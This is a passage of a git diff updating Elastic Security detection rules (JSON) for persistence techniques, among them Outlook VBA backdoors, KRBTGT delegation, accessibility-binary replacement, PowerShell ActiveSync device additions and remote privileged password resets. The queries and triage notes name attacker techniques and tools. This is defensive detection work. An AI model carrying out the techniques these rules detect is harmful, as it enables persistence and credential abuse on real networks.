"risk_score": 73, "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json index da114ee50ea96..b4ef4b6035b67 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ms_outlook_vba_template.json @@ -15,14 +15,27 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Microsoft Outlook VBA", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", "references": [ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json index 2895fef234f7b..a6f3e730703d4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_msds_alloweddelegateto_krbtgt.json @@ -11,14 +11,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "KRBTGT Delegation Backdoor", - "note": "## Config\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nAccount Management > \nAudit User Account Management (Success,Failure)\n```\n", + "note": "", "query": "event.action:modified-user-account and event.code:4738 and winlog.event_data.AllowedToDelegateTo:*krbtgt*\n", "references": [ "https://skyblue.team/posts/delegate-krbtgt", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AllowedToDelegateTo", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", + "setup": "The 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -62,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json similarity index 59% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json index 20e52ad1aca7b..cf64ed5655d2f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_or_delete_application_sign_on_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification or Removal of an Okta Application Sign-On Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:(application.policy.sign_on.update or application.policy.sign_on.rule.delete)\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/App_Based_Signon.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cd16fb10-0261-46e8-9932-a0336278cdbe", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,27 @@ "Okta", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json index 2df59206645b4..c0d43c8768560 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_periodic_tasks_file_mdofiy.json @@ -17,6 +17,23 @@ "https://www.oreilly.com/library/view/mac-os-x/0596003706/re328.html", "https://github.com/D00MFist/PersistentJXA/blob/master/PeriodicPersist.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "48ec9452-e1fd-4513-a376-10a1a26d2c83", "severity": "low", @@ -53,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json index ecaa09e538cf7..9ec41a5346815 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_powershell_exch_mailbox_activesync_add_device.json @@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "New ActiveSyncAllowedDeviceID Added via PowerShell", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Set-CASMailbox*ActiveSyncAllowedDeviceIDs*\"\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", "https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ce64d965-6cb0-466d-b74f-8d2c76f47f05", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -47,7 +65,7 @@ "subtechnique": [ { "id": "T1098.002", - "name": "Exchange Email Delegate Permissions", + "name": "Additional Email Delegate Permissions", "reference": "https://attack.mitre.org/techniques/T1098/002/" } ] @@ -57,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json index e9f510c112fbf..d01d1629e3054 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_priv_escalation_via_accessibility_features.json @@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by\naccessibility features. Windows contains accessibility features that may be launched with a key combination before a\nuser has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs\nare launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features\nbinaries' original file names, which is likely a custom binary deployed by the attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by\naccessibility features. Windows contains accessibility features that may be launched with a key combination before a\nuser has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs\nare launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features\nbinaries' original file names, which is likely a custom binary deployed by the attacker.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive\n(B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -75,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json index 864827b99f31e..b7776e3a04bae 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_cluster_creation.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Cluster Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(CreateDBCluster or CreateGlobalCluster) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-db-cluster.html", @@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/create-global-cluster.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateGlobalCluster.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e14c5fd7-fdd7-49c2-9e5b-ec49d817bc8d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -62,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json index f5a8b12e5485a..ad308ec83690f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_group_creation.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Security Group Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBSecurityGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "378f9024-8a0c-46a5-aa08-ce147ac73a4e", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json index 0bc967072e0c9..8638b22ccf16e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_rds_instance_creation.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Instance Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:CreateDBInstance and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_CreateDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f30f3443-4fbb-4c27-ab89-c3ad49d62315", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Persistence" ], "threat": [ { @@ -45,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json index 305a951c54367..5642aa8ef2f9f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_redshift_instance_creation.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Redshift Cluster Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:redshift.amazonaws.com and event.action:CreateCluster and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/redshift/latest/APIReference/API_CreateCluster.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "015cca13-8832-49ac-a01b-a396114809f6", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Persistence" ], "threat": [ { @@ -44,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json index ed8aa95d06696..4060df4d58bb1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_registry_uncommon.json @@ -14,6 +14,28 @@ "references": [ "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "54902e45-3467-49a4-8abc-529f2c8cfb80", "severity": "medium", @@ -67,5 +89,5 @@ "timeline_title": "Comprehensive Registry Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json index 4c7390210eb37..8d1263479c15a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_remote_password_reset.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies an attempt to reset an account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", "false_positives": [ "Legitimate remote account administration." ], @@ -14,12 +14,59 @@ "language": "eql", "license": "Elastic License v2", "name": "Account Password Reset Remotely", - "query": "sequence by host.id with maxspan=5m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\"] by winlog.event_data.SubjectLogonId\n", + "query": "sequence by host.id with maxspan=5m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : \"S-1-5-21-*-500\"\n )\n ] by winlog.event_data.SubjectLogonId\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", "severity": "medium", @@ -48,5 +95,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json index 61ceebb7615f5..91e3115ade304 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_route_53_domain_transfer_lock_disabled.json @@ -16,14 +16,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Route 53 Domain Transfer Lock Disabled", - "note": "## Config\n\nThe AWS Fleet 